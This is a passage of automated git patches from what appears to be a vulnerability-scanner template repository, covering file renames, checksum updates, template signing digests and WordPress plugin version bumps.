insertions(+), 0 deletions(-) rename http/cves/{ => 2023}/CVE-2023-5222.yaml (100%) diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml similarity index 100% rename from http/cves/CVE-2023-5222.yaml rename to http/cves/2023/CVE-2023-5222.yaml From c266d52f642c247f96d59051cd7906033aff2b51 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 17:12:56 +0000 Subject: [PATCH 1774/1841] Auto Generated New Template Addition List [Tue Jul 30 17:12:56 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e623213054..3c182014ce 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml +http/misconfiguration/manage-cabinet-register.yaml http/osint/user-enumeration/substack.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml From 329cb6ffe41cd61d45c6d7bcfca8ebfb7366c33d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 17:13:02 +0000 Subject: [PATCH 1775/1841] Auto Generated Templates Checksum [Tue Jul 30 17:13:02 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2f795df8ae..494222665a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,8 +224,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:849522c9dc1ee107490581ee14c762b5989fcfb3 -cves.json-checksum.txt:8cd3554ea1c2c29e359a9d9e93f099cc2781c86b +cves.json:9b83853729452d4602f4bdf051c16277623d816d +cves.json-checksum.txt:6f3e34ff4b28e06515f1f1d0572a6ea0c096e2d0 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3506,7 +3506,7 @@ http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 -http/cves/2024/CVE-2024-39903.yaml:5ca76939f32b8d5b69e0cadbeae884cdfcea172e +http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -5870,6 +5870,7 @@ http/misconfiguration/linkerd-ssrf-detect.yaml:66aaed4e25760830722d077aecd0fc09d http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3bc8297db1bcd http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 +http/misconfiguration/manage-cabinet-register.yaml:a989a9340ac6793375a7ed535e09172244823538 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 @@ -8943,7 +8944,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b043f00554f92ffbb656ccae56a9f3f9fad09312 +templates-checksum.txt:c4c02153a862f5a0ad7d7fded440d7777ad04b75 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 58510b354f202321e259d46b5c99ed975b957974 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 17:13:46 +0000 Subject: [PATCH 1776/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3fba94856e..92ceb647e0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' + - 'http/misconfiguration/manage-cabinet-register.yaml' - 'http/osint/user-enumeration/substack.yaml' - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' From 559cc8f40aef99cab35cb93fdb7d2595c94cc950 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 17:14:49 +0000 Subject: [PATCH 1777/1841] Auto Template Signing [Tue Jul 30 17:14:49 UTC 2024] :robot: --- http/misconfiguration/manage-cabinet-register.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/manage-cabinet-register.yaml b/http/misconfiguration/manage-cabinet-register.yaml index 9e13d17361..0153269289 100644 --- a/http/misconfiguration/manage-cabinet-register.yaml +++ b/http/misconfiguration/manage-cabinet-register.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100de708b7ed25bd1fab327150f79f1176cf7d7b65b17d61707c1b2c87716c1ad8e0220795368fe422ecde66825e0984a53117d68c19f3ef7b70c5d91a6961319e80f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3589d7d33d8fbb697cb102a8ecbbdd4756c96982 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 31 Jul 2024 00:17:08 +0000 Subject: [PATCH 1778/1841] Auto WordPress Plugins Update [Wed Jul 31 00:17:08 UTC 2024] :robot: --- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index c68232647c..c4c6ccc81c 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.11.1 \ No newline at end of file +6.11.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 39364c98a4..b9abdbb466 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.57.0 \ No newline at end of file +4.58.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index c32b220d83..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220090f69a833cab3cc2f8312f7387171adfb2a6b13991f217de639113cc74ce38a02210083f707d34b0214e9db1a337b729c34a1f35eaba036f269d34c93ce3b0aa74ee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index d71c2b6df7..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2eab4b5497d08d6410680181d0e91737bdfef7a988025c4f70fd0c18e376731022100ffde59db7522e2c4cc398bee25d0dfa11c7cedcaf241199a87b1fb1fd45d1b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 0e11a8ec4a..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbe72f1055f73fb2873b72bacdfa519be5d11da057b416416b197334522a134f02204b6e8df8d4d5f1d6243b80ee9221ceeb0bd85c239bf8f6cba8287bbfd4e641df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 5ac5e963ed..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2ea70019864ff59ef0f8361a76b34043969ced9821f1282af117cb739f3738f022100e8ce8a422692e653a1d73e326546ff57931e9729bec928270811e569abcace8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index df1e1b21e7..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220630da8eff913fdbf804230508269b9d29c93bfacd48a930719efea4e47f383af022100a433996778866dafbc6cf7c5a1d04fe97b21098627eea94d99750129e8e1f919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index ea640b8622..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100821f8c0fbf6e138765cd584a35a73c57b591d2612205d0445bc25a0124ec7e9b022100c1654dea2a232fc6c70abd68961a50788b183bdf477b77924ff7151661fb8cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index d7e3bd0b2b..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d824e3c655700208ae505ec2dbadcf1d17eff72bcb303f0148ee4f7c3cdee2b02205efdb65fbcfa4a711cc82c5c4177ac90a6dd2c899a04472eb91e642a15068b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 3ea47ebbf6..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207998f2d37027e6d310418d0396118c8d1261284dab7141a03864a42c2f69047202202c9c4a33990120d36463e339cc41d4fedcb6c6918c7a4b6d15b7d23d31d6bede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 1a9226d121..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220175b15d52dc4971094d9799625587426db7459d0a9330428464bdb8e4301475d0220501b5b7d3d9db1734eb0081474c0774345ef768ab725dc006ce66d6434c1d275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 8983c65de2..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5577072ab12c3038de4d11435cb6ff3f104dee4ffeb246740be594c93c99d1d022100e50957ac5b9f5908b5ded2fe92b1af31430e254e4ac610b1fec9b9d020422246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index e92560357f..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005fc87d871cf55b70afbb40a3b5cc81182e24442d935cf942116b5f7842107e70220502cdbd71c16c2c00e9df57b874755dffcc2d856a1d39578f6ee29fd692ce887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 012476abc5..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040ffe14a9569705c2cc41c91067a1906f6330aed89e92de76213404ef57d14f8022100dce0d68a84cd213cbc85ac2d19a7d2ae71e4cf1042c8ee601572d5b6f2f345e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 2deb6289b9..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0efb49535052df071553d519a75fb7747eeb45dab40893c0e81550d3535952d0221008ca79e8a561983b4783220f140b3e645a3c3baa05a91bb80faf1c01a7c4a4639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index c69be79e65..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100875449fe2ec6ddf47c8b5824515ceaa4fb3533ecbecb2797e34f06d8f4234ebf02202cdca60900d9181857f736564aa0d33a84111398506e7a8622c514b377903d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f65c61ff22..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb2599be7c92dfb1a0f3dda5c1968e25160f5f96d06e27e9e7173bcab5bb710d022100d71a1a25f51800417edf83958bb434bf1d592055c02031517b0334a904221ad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 